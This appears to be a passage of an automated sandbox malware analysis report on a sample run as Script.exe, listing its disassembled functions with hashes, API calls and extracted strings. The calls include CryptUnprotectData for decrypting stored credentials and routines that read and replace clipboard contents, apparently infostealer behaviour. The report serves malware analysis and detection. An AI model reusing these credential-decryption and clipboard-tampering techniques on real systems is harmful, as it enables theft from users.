Opcode Fuzzy Hash: 18c9b75cb6a99ab7070716c62b702a666f9c5dedece0088e99b4b062101d81a4
Instruction Fuzzy Hash: 45913971A042598FCB51CFADC480AEDFBF1BF99310F68C55AD468A7352C334A981DBA1

Function 00F706E0 Relevance: 1.6, APIs: 1, Instructions: 54
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(03973588,?,?,?,?,?,?,?,?,0048D2FB,00000000,?,00F70D9B,?,00000040), ref: 00F72B49

Memory Dump Source

Source File: 00000000.00000002.2035976393.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f70000_Script.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: a454f61deb51929ba23a497e1e494e2bc5c8089af8835fa5831aafb875cdded5
Instruction ID: 11a0deee216e0582cd3abe210b186972cce7df3d5ec078b59616ac4175939aa5
Opcode Fuzzy Hash: a454f61deb51929ba23a497e1e494e2bc5c8089af8835fa5831aafb875cdded5
Instruction Fuzzy Hash: B421CFB5D01659AFCB10DF9AD884ADEFBB4FB49310F50812AE918A7200C3B4A954DFE5

Analysis Process: Script.exePID: 1480, Parent PID: 5060COMMON

Execution Graph

Execution Coverage:	8.9%
Dynamic/Decrypted Code Coverage:	5%
Signature Coverage:	64.8%
Total number of Nodes:	318
Total number of Limit Nodes:	27

Executed Functions

Function 00412800 Relevance: 215.4, APIs: 3, Strings: 119, Instructions: 1881COMMON

Download Yara Rule

Strings

D, xrefs: 00413B5E
8, xrefs: 004130FD
p, xrefs: 00413E8D
9, xrefs: 0041411D
~, xrefs: 00413E5D
D, xrefs: 00414575
", xrefs: 0041312D
|, xrefs: 00413E6D
L, xrefs: 00413EED
L, xrefs: 00414215
R, xrefs: 00414165
M, xrefs: 0041421D
J, xrefs: 004140CD
t, xrefs: 00413EAD
X, xrefs: 004141B5
J, xrefs: 00413EBD
P, xrefs: 00414175
., xrefs: 00413B0E
W, xrefs: 00412975
z, xrefs: 004136B3
O, xrefs: 00413B36
\, xrefs: 00414195
k, xrefs: 00413317
%, xrefs: 00413165
;, xrefs: 004140DD
T, xrefs: 00414155
x, xrefs: 004136BD
^, xrefs: 00413520
?, xrefs: 0041412D
K, xrefs: 00413B16
d, xrefs: 00413D10
C, xrefs: 00413B56
], xrefs: 00413518
^, xrefs: 00414185
h, xrefs: 0041331F
I, xrefs: 00413B06
F, xrefs: 00413F1D
>, xrefs: 0041310D
-, xrefs: 0041409D
n, xrefs: 00413DDD
g, xrefs: 00413D08
S, xrefs: 004135CC
r, xrefs: 00413E7D
I, xrefs: 00412F61
J, xrefs: 00412F66
Q, xrefs: 004134F8
(, xrefs: 004140AD
V, xrefs: 00414145
., xrefs: 00413D75
D, xrefs: 00414310
D, xrefs: 00414582
`, xrefs: 004137FE
_, xrefs: 00413528
x, xrefs: 00413E4D
x, xrefs: 00412AC1
), xrefs: 00413292
, xrefs: 0041390B
j, xrefs: 0041330F
l, xrefs: 00413DED
B, xrefs: 0041410D
Z, xrefs: 004141A5
<, xrefs: 0041311D
d, xrefs: 004136D1
", xrefs: 00412861
, xrefs: 0041313D
@, xrefs: 00413F0D
F, xrefs: 004141C5
/, xrefs: 00413D65
f, xrefs: 00413E1D
z, xrefs: 00413E3D
M, xrefs: 004135BC
V, xrefs: 00412D39
E, xrefs: 00413B66
}, xrefs: 0041419D
N, xrefs: 00414205
h, xrefs: 00413DCD
e, xrefs: 004136D6
", xrefs: 004140BD
B, xrefs: 00413EFD
?, xrefs: 00413906
(, xrefs: 0041328A
M, xrefs: 00413B26
d, xrefs: 0041296D
L, xrefs: 00413282
D, xrefs: 004141D5
S, xrefs: 00413508
I, xrefs: 004140FD
@, xrefs: 004141F5
", xrefs: 00413DB5
D, xrefs: 00413F2D
d, xrefs: 00413E2D
b, xrefs: 004136DB
G, xrefs: 00413F25
W, xrefs: 00413AF6
f, xrefs: 004136C7
W, xrefs: 00413CF8
H, xrefs: 00413ECD
U, xrefs: 00413AE6
<, xrefs: 004140ED
W, xrefs: 004134E8
A, xrefs: 00413B46
f, xrefs: 00413D00
&, xrefs: 0041314D
`, xrefs: 00413E0D
v, xrefs: 00413E9D
$, xrefs: 0041315D
!, xrefs: 00413DA5
4, xrefs: 00413D95
~, xrefs: 004128EB
u, xrefs: 00412ABC
*, xrefs: 0041316D
B, xrefs: 004141E5
o, xrefs: 0041420D
\, xrefs: 00412C11
N, xrefs: 00413EDD
J, xrefs: 00414225
b, xrefs: 00413DFD
P, xrefs: 00412E40
j, xrefs: 00413DBD

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID: $ $!$"$"$"$"$$$%$&$($($)$*$-$.$.$/$4$8$9$;$<$<$>$?$?$@$@$A$B$B$B$C$D$D$D$D$D$D$E$F$F$G$H$I$I$I$J$J$J$J$K$L$L$L$M$M$M$N$N$O$P$P$Q$R$S$S$T$U$V$V$W$W$W$W$X$Z$\$\$]$^$^$_$`$`$b$b$d$d$d$d$e$f$f$f$g$h$h$j$j$k$l$n$o$p$r$t$u$v$x$x$x$z$z$|$}$~$~
API String ID: 0-2503919036
Opcode ID: 333223b3d8cecaabd6ca7747ab622fc5983fc3dd1da0add89a8961b5d679454e
Instruction ID: a4e1d19435823813fa5ed7861ca07fba08d4dcf996eff1ce6596ec81dfd1b1a5
Opcode Fuzzy Hash: 333223b3d8cecaabd6ca7747ab622fc5983fc3dd1da0add89a8961b5d679454e
Instruction Fuzzy Hash: 7003BD7050C7C08AD3349B38C5483EFBBE1AB96314F188A6EE4E9873D2D7798585875B

Function 0043BD30 Relevance: 34.2, APIs: 11, Strings: 8, Instructions: 923
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(8A9594AF,00000000,00000001,A7A6A5D9,00000000), ref: 0043C1D3
SysAllocString.OLEAUT32 ref: 0043C272
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043C2B0
SysAllocString.OLEAUT32 ref: 0043C307
SysAllocString.OLEAUT32 ref: 0043C397
VariantInit.OLEAUT32(?), ref: 0043C403
SysFreeString.OLEAUT32(00000000), ref: 0043C6F8
SysFreeString.OLEAUT32(?), ref: 0043C6FE
SysFreeString.OLEAUT32(00000000), ref: 0043C70B
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0043C747

Strings

gD?z, xrefs: 0043C32E
=hn, xrefs: 0043C356
t"j, xrefs: 0043C34E
*LMB, xrefs: 0043BE58
gd, xrefs: 0043C36E
(), xrefs: 0043C43C
FgsQ, xrefs: 0043C047
x~, xrefs: 0043C336

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID: String$AllocFree$BlanketCreateInformationInitInstanceProxyVariantVolume
String ID: x~$()$*LMB$=hn$FgsQ$gD?z$gd$t"j
API String ID: 2247799857-2687496081
Opcode ID: 9646928004e493e873474e1a9c2ba9306f54872f674c593cf53528557175dba5
Instruction ID: 7b4a77198e081a6bf760ad8dd3181f071ef8c0eb13ec8bb30fa34dd7bcb3dc0d
Opcode Fuzzy Hash: 9646928004e493e873474e1a9c2ba9306f54872f674c593cf53528557175dba5
Instruction Fuzzy Hash: 7F5202726083408BD314CF29C89176BBBE2EFC5314F199A2DE5D59B390DB79D805CB86

Function 004156D0 Relevance: 21.0, APIs: 1, Strings: 10, Instructions: 1710encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00415F9A

Strings

RIAJ, xrefs: 00416131
^, xrefs: 0041621C
i, xrefs: 00416BF2
^BPj, xrefs: 0041613C
eo, xrefs: 00416BE7
$8, xrefs: 00416212
5N;L, xrefs: 00415795
s9, xrefs: 00416BDC
WB_r, xrefs: 00416152
TQCC, xrefs: 00416147

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID: CryptDataUnprotect
String ID: $8$5N;L$RIAJ$TQCC$WB_r$^$^BPj$eo$i$s9
API String ID: 834300711-1407231502
Opcode ID: ae52f64b7386fa0117d7b609790d29269db89bb692703f37e6384dbafc89d7ab
Instruction ID: 9d03ad2b7482581dfa1f5b7d0cb5fc753bfc635ade748ce0448ee83b26185a4d
Opcode Fuzzy Hash: ae52f64b7386fa0117d7b609790d29269db89bb692703f37e6384dbafc89d7ab
Instruction Fuzzy Hash: D2C222B5508341CFD724CF24C8557ABB7E1EFC6314F19492EE4998B391EB389845CB8A

Function 004110D7 Relevance: 20.1, APIs: 1, Strings: 10, Instructions: 839
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

1, xrefs: 0041126F
T, xrefs: 00411AF0
N, xrefs: 004116D6
9, xrefs: 0041197C
l, xrefs: 004118E0
{, xrefs: 00411171
], xrefs: 004113D7
2, xrefs: 00411545
>, xrefs: 004110E5
), xrefs: 004116C6

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID: )$1$2$9$>$N$T$]$l${
API String ID: 0-2785627941
Opcode ID: c3978d2712f04d431a7751b088645abaa3858730cb70b260172965d3ebca501b
Instruction ID: c35bc677d90c04fbadb96941c4f19911cc192cb5d4c5b609c2b892bb84ac21ae
Opcode Fuzzy Hash: c3978d2712f04d431a7751b088645abaa3858730cb70b260172965d3ebca501b
Instruction Fuzzy Hash: 2262D072A0C7808BC7249B38C5953EEBBE1ABC5324F184A3ED5EAC73D2D67885418747

Function 03BD1000 Relevance: 19.6, APIs: 13, Instructions: 81
clipboardsleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000001), ref: 03BD1032
OpenClipboard.USER32(00000000), ref: 03BD103C
GetClipboardData.USER32(0000000D), ref: 03BD104C
GlobalLock.KERNEL32(00000000), ref: 03BD105D
GlobalAlloc.KERNEL32(00000002,-00000004), ref: 03BD1090
GlobalLock.KERNEL32 ref: 03BD10A0
GlobalUnlock.KERNEL32 ref: 03BD10C1
EmptyClipboard.USER32 ref: 03BD10CB
SetClipboardData.USER32(0000000D), ref: 03BD10D6
GlobalFree.KERNEL32 ref: 03BD10E3
GlobalUnlock.KERNEL32(?), ref: 03BD10ED
CloseClipboard.USER32 ref: 03BD10F3
GetClipboardSequenceNumber.USER32 ref: 03BD10F9

Memory Dump Source

Source File: 00000002.00000002.3253680562.0000000003BD1000.00000020.00000800.00020000.00000000.sdmp, Offset: 03BD0000, based on PE: true

Associated: 00000002.00000002.3253668355.0000000003BD0000.00000002.00000800.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3253693417.0000000003BD2000.00000002.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3bd0000_Script.jbxd

Similarity

API ID: ClipboardGlobal$DataLockUnlock$AllocCloseEmptyFreeNumberOpenSequenceSleep
String ID:
API String ID: 1416286485-0
Opcode ID: 30bafbac263aad805ec04ab319667777fa931f28dd4baaa072641a77dbe04aa2
Instruction ID: 73262c672fd04e4e90fc812f37a4382b9f8ca68d8960871e69af89fd59f7334b
Opcode Fuzzy Hash: 30bafbac263aad805ec04ab319667777fa931f28dd4baaa072641a77dbe04aa2
Instruction Fuzzy Hash: 8E21D8316062819FDB60BBB9AD09B1AB7ACFF0476DF0848B4F545DB954F7318910C761

Function 00422350 Relevance: 11.7, Strings: 9, Instructions: 472
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

,, xrefs: 0042283A
), xrefs: 004225B7
p, xrefs: 00422506
q, xrefs: 0042250E
!@, xrefs: 00422383
(, xrefs: 004225B2
w, xrefs: 00422501
5, xrefs: 004225A3
7, xrefs: 004225AD

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID: AllocateHeap
String ID: !@$($)$,$5$7$p$q$w
API String ID: 1279760036-1769235293
Opcode ID: da91e69bba004871f932a3096657dc4a307fb293a65136f56a8b7c95ea899dba
Instruction ID: 317bd083050837ab022f7a3f86f9413fa7e71de7494f0d5b2a9ddfd70e0e5717
Opcode Fuzzy Hash: da91e69bba004871f932a3096657dc4a307fb293a65136f56a8b7c95ea899dba
Instruction Fuzzy Hash: 7F12CE7170C3609FD3249F28D59436FBBE1ABC5314F588A2EE4D987391D3B988858B4B

Function 00408A60 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 249
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00408A84
GetCurrentThreadId.KERNEL32 ref: 00408A8E
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408BA2
GetForegroundWindow.USER32 ref: 00408BC7
ExitProcess.KERNEL32 ref: 00408D41

Strings

C`AF, xrefs: 00408C85

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID: C`AF
API String ID: 4063528623-2532276494
Opcode ID: 46347ff0e2cbb05d8b7451659b5a48e33ed07b1b5cd38f28975f7bff7d990deb
Instruction ID: 1a605c168883fbc90dcab8abc48fe8ab2000c02e2401af38a161b36fc495b272
Opcode Fuzzy Hash: 46347ff0e2cbb05d8b7451659b5a48e33ed07b1b5cd38f28975f7bff7d990deb
Instruction Fuzzy Hash: 26719B77B047044BD308EFB9DD56366B6C69BC5314F0E853D9889DB3D2EEB899088386

Function 0040CECB Relevance: 7.6, Strings: 6, Instructions: 149
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

vMnO, xrefs: 0040CEE3
23,, xrefs: 0040D055
+E-G, xrefs: 0040CED3
!I/K, xrefs: 0040CEDB
7U0W, xrefs: 0040CEF3
hi, xrefs: 0040CF1B

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID: !I/K$+E-G$23,$7U0W$hi$vMnO
API String ID: 0-280941541
Opcode ID: b310955efd1bbe41752e6671e77fd99e906004300efec5c75b3d6a38c503ff1e
Instruction ID: 41705afbfd3d844c95d88cec414e0b38dbef83d995e9333c1bc4aff74f254a7f
Opcode Fuzzy Hash: b310955efd1bbe41752e6671e77fd99e906004300efec5c75b3d6a38c503ff1e
Instruction Fuzzy Hash: AF41EE752093519BD7189F28C86177BB7E2EF96304F089A2DE4869B3D1E7788901CB4A

Function 00425F4E Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 434
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?), ref: 00425F73

Strings

LeB, xrefs: 00425F87
HN, xrefs: 00426122

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: LeB$HN
API String ID: 237503144-3899018704
Opcode ID: bd52984016028d1a77e2dd1543d6699d5292c7b6a97d3de1adce2dc1eb07e386
Instruction ID: 52c0b11ce76a413833eee2dc79a3c71761f94e4961f17601873f3dc33285994d
Opcode Fuzzy Hash: bd52984016028d1a77e2dd1543d6699d5292c7b6a97d3de1adce2dc1eb07e386
Instruction Fuzzy Hash: 66E1DFB0608300CFD310DF64E89161BBBE1EFC6708F45892DE9958B391DB799909DB4B

Function 0043180D Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 331
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 00431915

Strings

\LCO, xrefs: 00431A4A
+\,, xrefs: 00431B4A
PL, xrefs: 00431929

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: +\,$PL$\LCO
API String ID: 3960555810-4264988971
Opcode ID: 5f0b93d2e67df28ad6006b8b64d61cab1bbc9f5560068e3530059e2d9b997fab
Instruction ID: 65483f2fd9586f2d2cdc4cd54482b5654991d9ab715a21da5ccd93f66d49ce05
Opcode Fuzzy Hash: 5f0b93d2e67df28ad6006b8b64d61cab1bbc9f5560068e3530059e2d9b997fab
Instruction Fuzzy Hash: D9A1D07190C3818BD719CF2984A036BFFE1AF9B344F18596DE0C5973A2D77A8805CB5A

Function 004376F7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32 ref: 00437745
GetSystemMetrics.USER32 ref: 00437754

Strings

, xrefs: 00437828

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 11687f684bdfe930839bac5dd522c69ea7967536473c1c25ffeabc4bda6510f5
Instruction ID: d3c53b805a701e9821e1ae1b526dca53fcc927ec1753ee0ab9079d13bac8e55d
Opcode Fuzzy Hash: 11687f684bdfe930839bac5dd522c69ea7967536473c1c25ffeabc4bda6510f5
Instruction Fuzzy Hash: AF5172B4E142189FCB40EFACD981A9DBBF0BF49310F11856AE898E7354D734A944CF96

Function 0043BAC0 Relevance: 5.2, Strings: 4, Instructions: 181
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

q, xrefs: 0043BADE
~, xrefs: 0043BACF
p, xrefs: 0043BAD9
w, xrefs: 0043BAD4

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID: p$q$w$~
API String ID: 0-288389675
Opcode ID: 31b3aa217ab8dbe58406905cf64ba65fa4d335bd048858b25232e65eb0e3c297
Instruction ID: 290ca510a470ec62b575bfae4eff52ec8c29ebdae999208a67776952cd14a53c
Opcode Fuzzy Hash: 31b3aa217ab8dbe58406905cf64ba65fa4d335bd048858b25232e65eb0e3c297
Instruction Fuzzy Hash: 0561387160D3418FD3248B28C45132BBBD1EBC9364F19962EE696873D1CB7C9945CBCA

Function 00429080 Relevance: 1.7, Strings: 1, Instructions: 420COMMON

Download Yara Rule

Strings

`jkh, xrefs: 004291D5

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID: InitializeThunk
String ID: `jkh
API String ID: 2994545307-2588032495
Opcode ID: 7c5439a9a35486f801d3a8c713c4dd6d00f1e57e395f7cb3548fcc1dc0331843
Instruction ID: f31f2ec9ede1edb172ab8977bb143913596d85e466b3dd7522acc335327c31b4
Opcode Fuzzy Hash: 7c5439a9a35486f801d3a8c713c4dd6d00f1e57e395f7cb3548fcc1dc0331843
Instruction Fuzzy Hash: 13C128727083219BE714CA29D89136BB7A1EF85314F98867ED88587381D33DDC0AC79A

Function 00442C50 Relevance: 1.6, Strings: 1, Instructions: 332COMMON

Download Yara Rule

Strings

_\]R, xrefs: 00442DF7

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID: InitializeThunk
String ID: _\]R
API String ID: 2994545307-1576797437
Opcode ID: 7b32cdb4d333b37885935303e43f52e5f421e95271025932feb3e2528ef9e8da
Instruction ID: 2b4fb16a2c22451b1ac85a1ae18fc4f1e8704dc3659224362fe187c7cdacfd80
Opcode Fuzzy Hash: 7b32cdb4d333b37885935303e43f52e5f421e95271025932feb3e2528ef9e8da
Instruction Fuzzy Hash: C6A157316093018BE718DF28C89076FB7E2EFD5320F59863DE8958B395DB789C069786

Function 004435F0 Relevance: 1.6, Strings: 1, Instructions: 332COMMON

Download Yara Rule

Strings

#*+(, xrefs: 00443868, 004438B2

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID: #*+(
API String ID: 0-3856419177
Opcode ID: fa18bd2ef887e9d6ac8f4e74196051e6ee1451595881d3e99d07646f46139e33
Instruction ID: 382df29020c673c36256c8bd105caa5d1c74ff9b8d25c49d3674d109dce4675a
Opcode Fuzzy Hash: fa18bd2ef887e9d6ac8f4e74196051e6ee1451595881d3e99d07646f46139e33
Instruction Fuzzy Hash: 149148B26083119FD714CF28C89072BBBE2EBC4714F19862DE9D98B391D774DD068B96

Function 004408C0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(00443BFD,00000002,00000018,?,?,00000018,?,?,?), ref: 004408EE

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 0040DB46 Relevance: 1.4, Strings: 1, Instructions: 162COMMON

Download Yara Rule

Strings

2C63EE89F9A03A3633642DA608956FF1, xrefs: 0040DCA5

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID: 2C63EE89F9A03A3633642DA608956FF1
API String ID: 0-3344818590
Opcode ID: cc1661076b6e1c4cea847d3f83f1261b26a36bb933365a5f116dcc6f1e8b7a03
Instruction ID: 133b4e38ed0c97576514f30d0d992465a0021d8d6b4861234b2cedf73e640ea8
Opcode Fuzzy Hash: cc1661076b6e1c4cea847d3f83f1261b26a36bb933365a5f116dcc6f1e8b7a03
Instruction Fuzzy Hash: 8651F27094C3849BE730DF64A8697EBBBE1EF99318F04082DD8C997282D7781509878B

Function 00430995 Relevance: 1.3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

Strings

jDLJ, xrefs: 004309A7

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID: jDLJ
API String ID: 0-3364439520
Opcode ID: 208d9910898305c8a690f0038673dea0d66d9acda1fc0550d4490da15e9804a3
Instruction ID: e8738534877f846eec56157b296dc2a06dd448da3e9760ab5bcad3c8299086af
Opcode Fuzzy Hash: 208d9910898305c8a690f0038673dea0d66d9acda1fc0550d4490da15e9804a3
Instruction Fuzzy Hash: D6316E32D157618BD314CE2C881136BFBD2ABD7320F1A571ED4E4972D5DA78880547C6

Function 00442B70 Relevance: 1.3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

Strings

@, xrefs: 00442BD8

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: c0d5aae2b894a2908c012c33cd3314f0f65f36dac97b0444e19ad2f412c0cb64
Instruction ID: 34aa38e5e6a5996b0afbca51112eaf6a07d3a14345adfcfc35df3e79b9b5a29a
Opcode Fuzzy Hash: c0d5aae2b894a2908c012c33cd3314f0f65f36dac97b0444e19ad2f412c0cb64
Instruction Fuzzy Hash: 2C2126714083059BD318DF58C9C266BB7B5FF85324F549A2DF968073E0D3759808CB9A

Function 0040C3E0 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 605871b0ab139b2ba08044733c64d87c78399b6118fe7fc6b0d1887053e623fe
Instruction ID: 2b2aa77256b9b74b8308b830ea7f69749428e4567090b84f87a679b7f9f856a1
Opcode Fuzzy Hash: 605871b0ab139b2ba08044733c64d87c78399b6118fe7fc6b0d1887053e623fe
Instruction Fuzzy Hash: D741F37450C3419BD718CF18C8A077BBBE0EF85308F049A1CF5869B3A1D7798905CB8A

Function 0040E9F8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3253015902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3253015902.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Script.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3788327ea6bd62c381e4b0cf752e3b6233f7add6dcc4cc68ab56f76f28aa2470
Instruction ID: 9755dace815517ac6191751acb1774e3b5a73d73bf2623190deef1ca6af0ff5a
Opcode Fuzzy Hash: 3788327ea6bd62c381e4b0cf752e3b6233f7add6dcc4cc68ab56f76f28aa2470
Instruction Fuzzy Hash: A021EE702183019BDB14CF04C8C1B6B77B1FF88314F048A2DF195572E2E3B498988F8A

